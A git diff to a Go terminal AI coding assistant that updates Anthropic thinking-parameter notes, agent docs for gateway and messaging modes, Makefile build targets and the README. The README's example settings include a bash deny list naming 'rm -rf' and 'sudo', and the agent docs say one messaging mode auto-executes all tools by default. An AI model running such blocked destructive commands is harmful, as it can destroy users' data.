diff --git a/.gitignore b/.gitignore
index f686dfb..b56f783 100644
--- a/.gitignore
+++ b/.gitignore
@@ -1,5 +1,8 @@
 # Binaries
 bin/
+npm/bin/
+!npm/bin/
+!npm/bin/vibecoding
 *.exe
 *.exe~
 *.dll
@@ -31,3 +34,4 @@ dist/
 npm/*.tgz
 *.png
 internal/vendored/bin/
+.vibe
diff --git a/.skills/anthropic-api/SKILL.md b/.skills/anthropic-api/SKILL.md
index 331b636..c1735e1 100644
--- a/.skills/anthropic-api/SKILL.md
+++ b/.skills/anthropic-api/SKILL.md
@@ -1,16 +1,16 @@
 ---
 name: anthropic-api
-description: Anthropic Messages API interface notes, usage fields, prompt caching, streaming behavior, and tool-use compatibility for this project.
+description: Anthropic Messages API notes, Claude model IDs, adaptive/manual thinking, usage fields, prompt caching, streaming behavior, and tool-use compatibility for this project.
 ---
 
 # Anthropic API
 
-Use this skill when working on Anthropic Messages API requests, SSE parsing, tool use blocks, prompt caching, or model-specific compatibility issues in this repository.
+Use this skill when working on Anthropic Messages API requests, Claude model compatibility, adaptive/manual thinking, SSE parsing, tool use blocks, prompt caching, or model-specific request fields in this repository.
 
 ## Load order
 
 1. Read this file first.
-2. Read [references/anthropic.md](references/anthropic.md) for the full Messages API request/response schema, streaming event flow, tool-use payloads, and prompt-caching semantics.
+2. Read [references/anthropic.md](references/anthropic.md) for the Messages API request/response schema, current Claude model notes, adaptive/manual thinking rules, streaming event flow, tool-use payloads, and prompt-caching semantics.
 
 ## Working rules
 
@@ -18,6 +18,8 @@ Use this skill when working on Anthropic Messages API requests, SSE parsing, too
 - Treat cached tokens as part of the full prompt footprint, not as extra completion.
 - Normalize usage once in the provider layer; avoid re-deriving Anthropic totals in the UI.
 - Preserve tool-use payload shape exactly, especially when tool input is empty or streamed in fragments.
+- Only send thinking parameters for models that support the selected thinking mode.
+- For Claude Opus 4.7, do not send manual `thinking: { "type": "enabled", "budget_tokens": ... }`; use adaptive thinking.
 
 ## Typical uses
 
@@ -25,3 +27,4 @@ Use this skill when working on Anthropic Messages API requests, SSE parsing, too
 - Handle `message_start`, `content_block_*`, and `message_delta`
 - Map `tool_use` / `tool_result`
 - Work with prompt caching and cache control markers
+- Configure Claude 4.6/4.7 thinking fields and `output_config.effort`
diff --git a/.skills/anthropic-api/references/anthropic.md b/.skills/anthropic-api/references/anthropic.md
index 0dd61fb..66e82d8 100644
--- a/.skills/anthropic-api/references/anthropic.md
+++ b/.skills/anthropic-api/references/anthropic.md
@@ -3,11 +3,14 @@
 ## Contents
 
 - [Endpoint and headers](#endpoint-and-headers)
+- [Claude models](#claude-models)
 - [Request body](#request-body)
 - [Message model](#message-model)
 - [Content blocks](#content-blocks)
 - [Tools and tool results](#tools-and-tool-results)
 - [Thinking](#thinking)
+- [Adaptive thinking](#adaptive-thinking)
+- [Manual extended thinking](#manual-extended-thinking)
 - [Prompt caching](#prompt-caching)
 - [Streaming protocol](#streaming-protocol)
 - [Usage semantics](#usage-semantics)
@@ -25,6 +28,27 @@
 
 Anthropic also supports beta headers for specific features. Keep those scoped to the feature that requires them.
 
+## Claude models
+
+Model IDs are API strings, not marketing names. Do not infer a model ID by adding dots or spaces to the product name.
+
+Current Claude 4 family notes that matter for this project:
+
+| Model family | Example API model ID pattern | Thinking mode |
+| --- | --- | --- |
+| Claude Opus 4.7 | `claude-opus-4-7...` | Adaptive thinking |
+| Claude Sonnet 4.6 | `claude-sonnet-4-6...` | Adaptive thinking |
+| Claude Opus 4.6 | `claude-opus-4-6...` | Adaptive thinking |
+| Claude 4 / 4.1 era models | `claude-sonnet-4...`, `claude-opus-4...` | Manual extended thinking when supported |
+| Claude 3.x models | `claude-3-...`, `claude-3-5-...` | Model-dependent; many do not support extended thinking |
+
+Project rules:
+
+- Keep the exact configured `model` string when sending requests.
+- Do not add thinking fields unless the model config marks `reasoning: true`.
+- Treat user-facing names such as "Claude Opus 4.7" as labels; configure the exact model ID in `settings.json`.
+- Use `--debug` or `VIBECODING_DEBUG=1` to inspect the final request body when a provider returns a vague 400.
+
 ## Request body
 
 Core request fields:
@@ -36,6 +60,7 @@ Core request fields:
 - `max_tokens` - required output cap
 - `stream` - `true` for SSE
 - `thinking` - optional thinking configuration
+- `output_config` - optional output configuration used by adaptive thinking and some compatible APIs
 - `metadata` - optional request metadata
 - `stop_sequences` - optional stop list
 - `temperature` - optional sampling control
@@ -152,18 +177,101 @@ Project-specific note:
 
 ## Thinking
 
-Anthropic's thinking parameter family supports model-dependent controls.
+Anthropic's thinking parameter family is model-dependent. The request format differs between adaptive thinking and manual extended thinking.
 
-Common fields:
+General rules:
 
-- `type: "enabled"`
-- `budget_tokens` for supported models and official API modes
+- Only send thinking fields for models that support the selected mode.
+- Do not send `budget_tokens` to adaptive-thinking models such as Claude Opus 4.7.
+- Do not replay thinking blocks without preserving their signatures when the API requires them.
+- If a proxy or compatible endpoint has its own thinking format, isolate that behavior behind provider config such as `thinkingFormat`.
 
 Notes:
 
 - not all models or proxies support the same thinking fields
 - some compatibility layers accept `thinking: { type: "enabled" }` without `budget_tokens`
 - the chosen budget should be aligned with the model's supported range
+- vague 400 responses from Anthropic-compatible proxies are often caused by a model/thinking format mismatch
+
+## Adaptive thinking
+
+Claude Opus 4.7 and the Claude 4.6 generation use adaptive thinking. The model decides how many thinking tokens to use based on request complexity. Clients control effort with `output_config.effort`.
+
+Request shape:
+
+```json
+{
+  "model": "claude-opus-4-7",
+  "max_tokens": 8192,
+  "messages": [
+    { "role": "user", "content": "Analyze this issue." }
+  ],
+  "thinking": {
+    "type": "adaptive",
+    "display": "summarized"
+  },
+  "output_config": {
+    "effort": "high"
+  }
+}
+```
+
+Adaptive thinking fields:
+
+- `thinking.type`: use `"adaptive"`
+- `thinking.display`: usually `"summarized"` when thinking should be surfaced as summaries
+- `output_config.effort`: effort level, commonly mapped from project thinking level
+
+Recommended project mapping:
+
+| Project thinking level | Anthropic adaptive effort |
+| --- | --- |
+| `minimal` | `low` |
+| `low` | `low` |
+| `medium` | `medium` |
+| `high` | `high` |
+| `xhigh` | `xhigh` |
+
+Compatibility rules:
+
+- For `claude-opus-4-7...`, prefer adaptive thinking over manual `budget_tokens`.
+- If adaptive thinking causes a provider 400, first verify the exact model ID and whether the endpoint is official Anthropic or a proxy.
+- `thinkingFormat: "adaptive"` can be used as an explicit project config override when URL/model auto-detection is not enough.
+
+## Manual extended thinking
+
+Older supported Claude models use manual extended thinking.
+
+Request shape:
+
+```json
+{
+  "model": "claude-sonnet-4-20250514",
+  "max_tokens": 8192,
+  "messages": [
+    { "role": "user", "content": "Think through this carefully." }
+  ],
+  "thinking": {
+    "type": "enabled",
+    "budget_tokens": 4096
+  }
+}
+```
+
+Manual fields:
+
+- `thinking.type`: use `"enabled"`
+- `thinking.budget_tokens`: explicit token budget for thinking
+
+Budget guidance:
+
+- `minimal`: about `1024`
+- `low`: about `4096`
+- `medium`: about `10240`
+- `high`: about `32768`
+- `xhigh`: about `65536`
+
+Do not use manual extended thinking for Claude Opus 4.7 unless official docs or the target endpoint explicitly say it supports that mode.
 
 ## Prompt caching
 
@@ -302,10 +410,15 @@ Compatibility details:
 - if the input is an empty tool argument object, the JSON object should still be preserved
 - some proxies emit usage in `message_delta` instead of `message_start`
 - some proxies do not accept the array form of `system`, so the provider may downgrade to string form
+- thinking fields are model-sensitive; only send them when `provider.Model.Reasoning` is true
+- Claude Opus 4.7-style IDs should use adaptive thinking and `output_config.effort`, not manual `budget_tokens`
+- if users report `API 400` with an empty or nil error type, inspect the debug request body for invalid `thinking`, `output_config`, `system`, or model ID fields
 
 Official docs:
 
-- Messages API reference: https://docs.anthropic.com/en/api/messages
-- Prompt caching: https://docs.anthropic.com/en/docs/build-with-claude/prompt-caching
-- Tool use: https://docs.anthropic.com/en/docs/build-with-claude/tool-use
-- Thinking: https://docs.anthropic.com/en/docs/build-with-claude/thinking
+- Messages API reference: https://platform.claude.com/docs/en/api/messages
+- Models overview: https://platform.claude.com/docs/en/docs/about-claude/models/overview
+- Prompt caching: https://platform.claude.com/docs/en/docs/build-with-claude/prompt-caching
+- Tool use: https://platform.claude.com/docs/en/docs/build-with-claude/tool-use
+- Thinking: https://platform.claude.com/docs/en/docs/build-with-claude/thinking
+- Adaptive thinking: https://platform.claude.com/docs/en/build-with-claude/adaptive-thinking
diff --git a/AGENTS.md b/AGENTS.md
index 76b70b8..2f5fb89 100644
--- a/AGENTS.md
+++ b/AGENTS.md
@@ -8,7 +8,7 @@ This file is for AI agents working in this repository. Keep changes aligned with
 - UI: Bubble Tea + Lipgloss
 - CLI: Cobra
 - Default working style: terminal-first, tool-driven
-- Main purpose: a terminal AI coding assistant with provider abstraction, sessions, tools, sandboxing, context files, and skills
+- Main purpose: a terminal AI coding assistant with provider abstraction, sessions, tools, sandboxing, context files, skills, and an OpenAI-compatible HTTP gateway
 
 ## Important Directories
 
@@ -17,24 +17,66 @@ This file is for AI agents working in this repository. Keep changes aligned with
 - `internal/config/` — settings and defaults
 - `internal/context/` — context window and compaction
 - `internal/contextfiles/` — `AGENTS.md` / `CLAUDE.md` discovery
+- `internal/hermes/` — Hermes messaging gateway mode
+- `internal/memory/` — persistent memory (memory.md)
+- `internal/messaging/` — messaging platform abstraction (wechat, feishu)
 - `internal/provider/` — provider abstraction and implementations
+- `internal/provider/factory/` — shared provider/model construction from config
+- `internal/provider/vendor*.go` — vendor adapter registry and per-vendor defaults
 - `internal/sandbox/` — sandbox backends
 - `internal/session/` — JSONL session storage
 - `internal/skills/` — skills loading
 - `internal/tools/` — built-in tools
 - `internal/tui/` — terminal UI
 - `internal/acp/` — ACP / MCP related integration
+- `internal/a2a/` — A2A (Agent-to-Agent) protocol server and master mode
+- `internal/gateway/` — OpenAI-compatible HTTP gateway mode
 - `internal/vendored/` — embedded `rg` / `fd`
 - `docs/` — documentation
 
 ## Architecture Notes
 
 - Providers stream responses through the provider abstraction.
+- Provider creation should go through `internal/provider/factory` so CLI and ACP keep the same behavior.
+- Vendor-specific behavior belongs in `internal/provider/vendor*.go` adapters and model `compat` flags, not in CLI/ACP wiring.
+- Each vendor that needs detection or defaults should have a separate `internal/provider/vendor_<name>.go` file.
+- Vendors without special behavior should fall back to the generic OpenAI-compatible or Anthropic-compatible provider based on `api` / base URL detection.
+- Do not change the settings JSON schema or the expected meaning of existing provider config fields when adding vendor support.
 - The agent loop builds a system prompt, sends messages, handles stream events, executes tools, and continues until completion.
 - Tools should stay stateless when possible; shared execution state belongs in registries/managers.
 - Context files and skills are first-class prompt inputs.
 - Sessions are stored as JSONL with parent/child relationships.
 
+### Gateway Mode
+
+- `internal/gateway/` implements an HTTP server exposing a standard OpenAI Chat Completions API.
+- Gateway reuses the same agent loop, provider factory, session, tools, sandbox, and skills as CLI/ACP — no separate agent logic.
+- Configuration lives in `gateway.json` (global `~/.config/vibecoding/gateway.json`, project `.vibe/gateway.json`), separate from `settings.json`.
+- Project-level `.vibe/gateway.json` overrides global, same pattern as `.vibe/settings.json`.
+- Gateway supports slash commands (`/clear`, `/mode`, `/compact`, etc.) processed at the HTTP layer without invoking the LLM.
+- Tool output visibility (`toolVisibility.mode` + `toolVisibility.detail`) is configurable: collapsed (default, one-line summary) or expanded (full code fences).
+- `edit`/`write` diffs and errors always show in full regardless of detail level.
+- When `x_session_id` is empty, the gateway reuses a default session so consecutive requests share context.
+- Security: three independent layers — Bearer token auth, `allowedWorkDirs` whitelist, sandbox (bwrap).
+- No external HTTP framework; uses `net/http` standard library.
+
+### Hermes Mode
+
+- `internal/hermes/` implements a messaging gateway for WeChat/Feishu/WebSocket with persistent agent sessions.
+- Hermes reuses the same agent loop, provider factory, session, tools, sandbox, skills, and MCP as CLI/ACP.
+- Configuration lives in `hermes.json` (global `<GLOBAL_DIR>/hermes.json`, project `.vibe/hermes.json`).
+- Per-user sessions stored in `<sessionDir>/hermes/<platform>/<user_id>/active.jsonl`.
+- Default mode is `yolo` (not `agent`) — messaging platforms are unattended by nature.
+- `default_provider` / `default_model` in hermes.json override settings.json; CLI `-p`/`-m` override hermes.json.
+- `multi_agent` enables sub-agent tools (spawn/status/send/destroy).
+- `sandbox` enables bwrap sandbox (default off).
+- MCP servers from global/project `mcp.json` are loaded per-session and auto-closed on removal.
+- memory.md defaults to project directory (`.vibe/memory.md`); only uses global when `memory.path` is explicitly set.
+- Progress events (tool execution + thinking) are sent to messaging platforms via `InboundMessage.ProgressFunc`.
+- The `messaging.InboundMessage.ProgressFunc` callback is set by each platform bot; nil means no progress updates.
+- `formatToolProgress` in `dispatcher.go` formats tool events as `[tool]: args ✅/❌`.
+- Think deltas are accumulated and flushed as `💭 ...` (truncated to 500 chars) before tool/text events.
+
 ## Working Rules
 
 - Read before editing.
@@ -58,18 +100,29 @@ Built-in tools include:
 - `read`, `write`, `edit`
 - `bash`, `jobs`, `kill`
 - `grep`, `find`, `ls`
+- `plan`, `question` (TUI plan mode only)
 - `skill_ref`
 
-`grep` and `find` are backed by embedded `rg` and `fd` binaries in `internal/vendored/`.
+`grep` and `find` are backed by embedded `rg` and `fd` binaries in `internal/vendored/`. On unsupported architectures (e.g., loong64), they automatically fall back to system `grep` / `find`.
 
 ## Modes and Safety
 
-- `plan`: read-only tools
+- `plan`: read-only tools + `question` (interactive, TUI only)
 - `agent`: file edits allowed; `bash` usually requires approval
 - `yolo`: all tools auto-execute
 
+The `question` tool is only registered in TUI + plan mode. It uses the `QuestionHandler` optional interface (type assertion) to avoid polluting the public `Agent` interface. Gateway/Hermes/ACP never register or expose it.
+
 When changing code, prefer the least risky approach that satisfies the request.
 
+## Gateway-Specific Notes
+
+- Gateway-only config belongs in `internal/gateway/config.go`, not in `internal/config/settings.go`.
+- Tool output formatting (collapsed/expanded, markdown code fences) belongs in `internal/gateway/tool_format.go`.
+- Slash command handlers belong in `internal/gateway/commands.go`, kept separate from TUI commands (different dependencies).
+- The `resolveToolEvent()` helper in `handler_chat.go` handles the fact that `EventToolCall` carries tool name in `ev.ToolCall.Name` (not `ev.ToolName`).
+- When adding new slash commands, add to both gateway `commands.go` and TUI `commands.go` to keep feature parity.
+
 ## Docs and Release Notes
 
 - Put changelog updates only in:
@@ -94,5 +147,5 @@ Common commands:
 
 ## Versioning Note
 
-Current version: `v0.1.12`
-Next version: `v0.1.13`
+Current version: `v0.1.31`
+Next version: `v0.1.32`
diff --git a/Makefile b/Makefile
index 5902c43..1a84987 100644
--- a/Makefile
+++ b/Makefile
@@ -1,20 +1,34 @@
-.PHONY: help build build-all install test lint fmt clean run
-.PHONY: build-linux build-linux-musl build-darwin build-windows
+.PHONY: help build build-all install test test-vendored lint fmt clean run
+.PHONY: build-linux build-linux-loong64 build-linux-musl build-darwin build-windows
 .PHONY: dist dist-linux dist-darwin dist-windows dist-deb dist-tarball dist-zip
+.PHONY: dist-linux-loong64
 .PHONY: clean-all checksums
-.PHONY: npm-version npm-publish npm-publish-all npm-pack npm-pack-all
+.PHONY: npm-version npm-binaries npm-packages npm-pack npm-publish-all npm-publish-pre npm-publish
 .PHONY: prepare-vendored
 
 # Variables
 BINARY_NAME=vibecoding
-VERSION=$(shell git describe --tags --always --dirty 2>/dev/null || echo "dev")
-LDFLAGS=-ldflags "-X main.version=$(VERSION) -X github.com/startvibecoding/vibecoding/internal/ua.Version=$(VERSION)"
+VERSION=$(shell git describe --tags --always 2>/dev/null || echo "dev")
+LDFLAGS=-ldflags "-s -w -X main.version=$(VERSION) -X github.com/startvibecoding/vibecoding/internal/ua.Version=$(VERSION)"
+GOBUILD_FLAGS=-trimpath
 DIST_DIR=dist
 CHECKSUM_FILE=$(DIST_DIR)/checksums.txt
 
-# Platforms and architectures
-PLATFORMS=linux darwin windows
-ARCHS=amd64 arm64
+# UPX compression (skip for macOS - not supported)
+USE_UPX ?= true
+ifeq ($(shell which upx 2>/dev/null),)
+USE_UPX = false
+endif
+ifeq ($(USE_UPX),true)
+UPX_CMD = upx -9
+else
+UPX_CMD = @true
+endif
+
+# Platforms and architectures (for reference)
+# linux: amd64 arm64 loong64
+# darwin: amd64 arm64
+# windows: amd64 arm64
 
 # Default target
 help:
@@ -22,7 +36,8 @@ help:
 	@echo ""
 	@echo "Build targets:"
 	@echo "  build            Build for current platform"
-	@echo "  build-linux      Build for Linux (amd64, arm64)"
+	@echo "  build-linux      Build for Linux (amd64, arm64, loong64)"
+	@echo "  build-linux-loong64 Build for Linux LoongArch64"
 	@echo "  build-linux-musl Build for Linux musl (amd64)"
 	@echo "  build-darwin     Build for macOS (amd64, arm64)"
 	@echo "  build-windows    Build for Windows (amd64, arm64)"
@@ -34,15 +49,19 @@ help:
 	@echo "  dist-linux     Build Linux packages (tar.gz + deb)"
 	@echo "  dist-darwin    Build macOS packages (tar.gz)"
 	@echo "  dist-windows   Build Windows packages (zip)"
+	@echo "  dist-linux-loong64 Build Linux LoongArch64 packages"
 	@echo "  dist-deb       Build Debian packages only"
 	@echo "  dist-tarball   Build tarball packages only"
 	@echo "  dist-zip       Build zip packages only"
 	@echo ""
 	@echo "NPM targets:"
 	@echo "  npm-version       Sync version to npm package"
+	@echo "  npm-packages      Build platform-specific npm packages"
 	@echo "  npm-pack          Pack main + all platform packages"
 	@echo "  npm-publish-all   Publish main + all platform packages"
-	@echo "  npm-publish       Publish main package only (legacy)"
+	@echo "  npm-publish-pre   Publish pre-release packages"
+	@echo "  npm-binaries      [Legacy] Build all binaries into single package"
+	@echo "  npm-publish       [Legacy] Publish main package only"
 	@echo ""
 	@echo "Other targets:"
 	@echo "  install        Install via go install"
@@ -61,31 +80,44 @@ prepare-vendored:
 
 # Build for current platform (requires prepare-vendored first)
 build: prepare-vendored
-	go build $(LDFLAGS) -o bin/$(BINARY_NAME) ./cmd/vibecoding
+	go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME) ./cmd/vibecoding
 
 # Platform builds
-build-linux:
+build-linux: prepare-vendored
 	@echo "Building for Linux..."
 	@mkdir -p bin
-	GOOS=linux GOARCH=amd64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-amd64 ./cmd/vibecoding
-	GOOS=linux GOARCH=arm64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-arm64 ./cmd/vibecoding
+	GOOS=linux GOARCH=amd64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-amd64 ./cmd/vibecoding
+	GOOS=linux GOARCH=arm64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-arm64 ./cmd/vibecoding
+	GOOS=linux GOARCH=loong64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-loong64 ./cmd/vibecoding
+	@echo "Compressing Linux amd64 binary with UPX..."
+	$(UPX_CMD) bin/$(BINARY_NAME)-linux-amd64
+
+build-linux-loong64: prepare-vendored
+	@echo "Building for Linux LoongArch64..."
+	@mkdir -p bin
+	GOOS=linux GOARCH=loong64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-loong64 ./cmd/vibecoding
 
-build-linux-musl:
+# musl: static build with CGO_ENABLED=0, arm64 not commonly needed
+build-linux-musl: prepare-vendored
 	@echo "Building for Linux musl..."
 	@mkdir -p bin
-	CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-musl-amd64 ./cmd/vibecoding
+	CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-linux-musl-amd64 ./cmd/vibecoding
+	@echo "Compressing Linux musl binary with UPX..."
+	$(UPX_CMD) bin/$(BINARY_NAME)-linux-musl-amd64
 
-build-darwin:
+build-darwin: prepare-vendored
 	@echo "Building for macOS..."
 	@mkdir -p bin
-	GOOS=darwin GOARCH=amd64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-darwin-amd64 ./cmd/vibecoding
-	GOOS=darwin GOARCH=arm64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-darwin-arm64 ./cmd/vibecoding
+	GOOS=darwin GOARCH=amd64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-darwin-amd64 ./cmd/vibecoding
+	GOOS=darwin GOARCH=arm64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-darwin-arm64 ./cmd/vibecoding
 
-build-windows:
+build-windows: prepare-vendored
 	@echo "Building for Windows..."
 	@mkdir -p bin
-	GOOS=windows GOARCH=amd64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-windows-amd64.exe ./cmd/vibecoding
-	GOOS=windows GOARCH=arm64 go build $(LDFLAGS) -o bin/$(BINARY_NAME)-windows-arm64.exe ./cmd/vibecoding
+	GOOS=windows GOARCH=amd64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-windows-amd64.exe ./cmd/vibecoding
+	GOOS=windows GOARCH=arm64 go build $(GOBUILD_FLAGS) $(LDFLAGS) -o bin/$(BINARY_NAME)-windows-arm64.exe ./cmd/vibecoding
+	@echo "Compressing Windows amd64 binary with UPX..."
+	$(UPX_CMD) bin/$(BINARY_NAME)-windows-amd64.exe
 
 # Build all platforms
 build-all: prepare-vendored build-linux build-linux-musl build-darwin build-windows
@@ -95,12 +127,25 @@ build-all: prepare-vendored build-linux build-linux-musl build-darwin build-wind
 
 # Install
 install:
-	go install $(LDFLAGS) ./cmd/vibecoding
+	go install $(GOBUILD_FLAGS) $(LDFLAGS) ./cmd/vibecoding
 
 # Test
-test:
+test: prepare-vendored test-vendored
 	go test -v -race ./...
 
+test-vendored:
+	@case "$$(go env GOOS)-$$(go env GOARCH)" in \
+		linux-amd64|linux-arm64|darwin-amd64|darwin-arm64|windows-amd64|windows-arm64) ;; \
+		*) echo "Vendored rg/fd unsupported for $$(go env GOOS)-$$(go env GOARCH); system grep/find fallback will be used."; exit 0 ;; \
+	esac; \
+	case "$$(go env GOOS)" in windows) ext=".exe" ;; *) ext="" ;; esac; \
+	dir="internal/vendored/bin/$$(go env GOOS)-$$(go env GOARCH)"; \
+	if [ ! -f "$$dir/rg$$ext" ] || [ ! -f "$$dir/fd$$ext" ]; then \
+		echo "Missing vendored rg/fd for $$(go env GOOS)-$$(go env GOARCH)."; \
+		echo "Run: make prepare-vendored"; \
+		exit 1; \
+	fi
+
 # Lint
 lint:
 	golangci-lint run ./...
@@ -117,29 +162,32 @@ clean:
 # Clean all
 clean-all: clean
 	rm -rf $(DIST_DIR)
+	rm -f npm/*.tgz
 
 # Run
 run: build
 	./bin/$(BINARY_NAME)
 
 # Distribution: tar.gz for Linux and macOS
-dist-tarball: prepare-vendored build-linux build-linux-musl build-darwin
+dist-tarball: build-linux build-linux-musl build-darwin
 	@echo ""
 	@echo "Creating tarball packages..."
-	@for os in linux darwin; do \
-		for arch in amd64 arm64; do \
-			echo "  Packaging $(BINARY_NAME)-$${os}-$${arch}.tar.gz..."; \
-			./scripts/build-tarball.sh $${os} $${arch} $(VERSION); \
-		done; \
+	@for arch in amd64 arm64 loong64; do \
+		echo "  Packaging $(BINARY_NAME)-linux-$${arch}.tar.gz..."; \
+		./scripts/build-tarball.sh linux $${arch} $(VERSION); \
+	done
+	@for arch in amd64 arm64; do \
+		echo "  Packaging $(BINARY_NAME)-darwin-$${arch}.tar.gz..."; \
+		./scripts/build-tarball.sh darwin $${arch} $(VERSION); \
 	done
 	@echo "  Packaging $(BINARY_NAME)-linux-musl-amd64.tar.gz..."; \
 	./scripts/build-tarball.sh linux-musl amd64 $(VERSION)
 
 # Distribution: deb for Linux
-dist-deb: prepare-vendored build-linux build-linux-musl
+dist-deb: build-linux build-linux-musl
 	@echo ""
 	@echo "Creating Debian packages..."
-	@for arch in amd64 arm64; do \
+	@for arch in amd64 arm64 loong64; do \
 		echo "  Packaging $(BINARY_NAME)_$(VERSION)_$${arch}.deb..."; \
 		./scripts/build-deb.sh $${arch} $(VERSION); \
 	done
@@ -147,7 +195,7 @@ dist-deb: prepare-vendored build-linux build-linux-musl
 	./scripts/build-deb.sh amd64-musl $(VERSION)
 
 # Distribution: zip for Windows
-dist-zip: prepare-vendored build-windows
+dist-zip: build-windows
 	@echo ""
 	@echo "Creating Windows zip packages..."
 	@for arch in amd64 arm64; do \
@@ -159,6 +207,13 @@ dist-zip: prepare-vendored build-windows
 dist-linux: dist-deb dist-tarball
 	@echo "Linux packages complete!"
 
+dist-linux-loong64: build-linux-loong64
+	@echo ""
+	@echo "Creating Linux LoongArch64 packages..."
+	./scripts/build-tarball.sh linux loong64 $(VERSION)
+	./scripts/build-deb.sh loong64 $(VERSION)
+	@echo "Linux LoongArch64 packages complete!"
+
 dist-darwin: dist-tarball
 	@echo "macOS packages complete!"
 
@@ -193,8 +248,9 @@ dist: dist-linux dist-darwin dist-windows checksums
 npm-version:
 	./scripts/sync-npm-version.sh $(VERSION)
 
-# Legacy: build all binaries into single package
+# Legacy: build all binaries into single package (use npm-packages instead)
 npm-binaries: build-all
+	@echo "WARNING: npm-binaries is deprecated, use npm-packages instead" >&2
 	./scripts/build-npm.sh
 
 # Build platform-specific packages
@@ -241,6 +297,7 @@ npm-publish-pre: npm-version npm-packages
 	cd npm && npm publish --tag next
 	@echo "Published all packages (pre-release)!"
 
-# Legacy: publish main package only
+# Legacy: publish main package only (use npm-publish-all instead)
 npm-publish: npm-version npm-binaries
+	@echo "WARNING: npm-publish is deprecated, use npm-publish-all instead" >&2
 	cd npm && npm publish --tag latest
diff --git a/README.md b/README.md
index 1720227..c650ac5 100644
--- a/README.md
+++ b/README.md
@@ -8,11 +8,26 @@
   A terminal-based AI coding assistant written in ~10,000 lines of Go, inspired by <a href="https://pi.dev">pi.dev</a>
 </p>
 
+<p align="center">
+  Progressive and agile vibe-coding tool. No need to re-deploy Claude Code 、 codex、Claw、Hermes; everything is packed into a single file.
+</p>
+
+<p align="center">
+  <a href="https://www.npmjs.com/package/vibecoding-installer"><img src="https://img.shields.io/npm/dm/vibecoding-installer.svg" alt="npm downloads"></a>
+  <a href="https://github.com/startvibecoding/vibecoding/releases/latest"><img src="https://img.shields.io/github/release/startvibecoding/vibecoding.svg" alt="GitHub release"></a>
+  <a href="https://opensource.org/licenses/MIT"><img src="https://img.shields.io/badge/License-MIT-blue.svg" alt="License: MIT"></a>
+  <a href="https://goreportcard.com/report/github.com/startvibecoding/vibecoding"><img src="https://goreportcard.com/badge/github.com/startvibecoding/vibecoding" alt="Go Report Card"></a>
+  <a href="https://pkg.go.dev/github.com/startvibecoding/vibecoding"><img src="https://pkg.go.dev/badge/github.com/startvibecoding/vibecoding?status.svg" alt="GoDoc"></a>
+  <a href="https://github.com/startvibecoding/vibecoding/network/dependencies"><img src="https://img.shields.io/librariesio/release/github/startvibecoding/vibecoding" alt="Dependencies"></a>
+</p>
+
 ## Features
 
-- **Multi-Provider Support**: DeepSeek (default), OpenAI, Anthropic, and any custom provider via OpenAI/Anthropic-compatible APIs
+- **Multi-Provider Support**: DeepSeek (default), OpenAI, Anthropic, and vendor adapters for compatible OpenAI/Anthropic-format APIs
 - **SSE Streaming**: Real-time token streaming for fast response delivery
 - **Think Mode**: Extended thinking/reasoning support (DeepSeek reasoning)
+- **Multi-Agent Workflows**: Optional `--multi-agent` mode with delegated sub-agents and cron command entry points
+- **A2A Master Mode**: Optional `--enable-a2a-master` mode to manage multiple remote A2A agents via `a2a-list.json`, registers `a2a_dispatch` tool for automatic task dispatch
 - **Three Modes**:
   - 🗒️ **Plan** — Read-only analysis and planning. Sandboxed, no file writes
   - 🔧 **Agent** (default) — Controlled read/write access to the project. Bash requires approval (configurable whitelist). Sandboxed, no network
@@ -95,7 +110,12 @@ Or configure directly in `settings.json`:
 ```json
 {
   "providers": {
-    "deepseek-openai": { "apiKey": "sk-..." }
+    "deepseek-openai": {
+      "vendor": "deepseek",
+      "api": "openai-chat",
+      "baseUrl": "https://api.deepseek.com",
+      "apiKey": "sk-..."
+    }
   }
 }
 ```
@@ -115,6 +135,9 @@ vibecoding -p "Write a hello world in Go"
 # Specify provider and model
 vibecoding --provider deepseek-openai --model deepseek-v4-flash
 
+# Enable sub-agent tools and multi-agent commands
+vibecoding --multi-agent
+
 # Change mode
 vibecoding --mode plan    # Read-only planning
 vibecoding --mode agent   # Standard (default)
@@ -138,6 +161,7 @@ vibecoding --no-sandbox
 | `.vibe/settings.json` | All | Project (overrides global) |
 
 > **Windows users:** `%APPDATA%` resolves to `C:\Users\<Username>\AppData\Roaming`.
+> Override the global config directory with `VIBECODING_DIR` environment variable.
 
 ### Example Settings
 
@@ -147,6 +171,7 @@ vibecoding --no-sandbox
   "defaultModel": "deepseek-v4-flash",
   "defaultThinkingLevel": "medium",
   "defaultMode": "agent",
+  "enablePlanTool": true,
   "maxContextTokens": 1000000,
   "maxOutputTokens": 384000,
   "compaction": {
@@ -169,11 +194,14 @@ vibecoding --no-sandbox
   },
   "approval": {
     "bashWhitelist": ["go ", "make ", "git ", "npm ", "yarn "],
-    "bashBlacklist": ["rm -rf", "sudo"]
+    "bashBlacklist": ["rm -rf", "sudo"],
+    "confirmBeforeWrite": true
   }
 }
 ```
 
+For the full list of settings including `cacheControl`, idle compression, sandbox paths, shell configuration, and API key formats, see the [Configuration Guide](docs/en/configuration.md).
+
 ### Environment Variables
 
 | Variable | Description |
@@ -185,6 +213,7 @@ vibecoding --no-sandbox
 | `VIBECODING_MODE` | Override default mode |
 | `VIBECODING_THINKING` | Override default thinking level |
 | `VIBECODING_USER_AGENT` | Custom User-Agent string |
+| `VIBECODING_DEBUG` | Enable provider-level request/response debug output |
 
 ## Sandbox Security
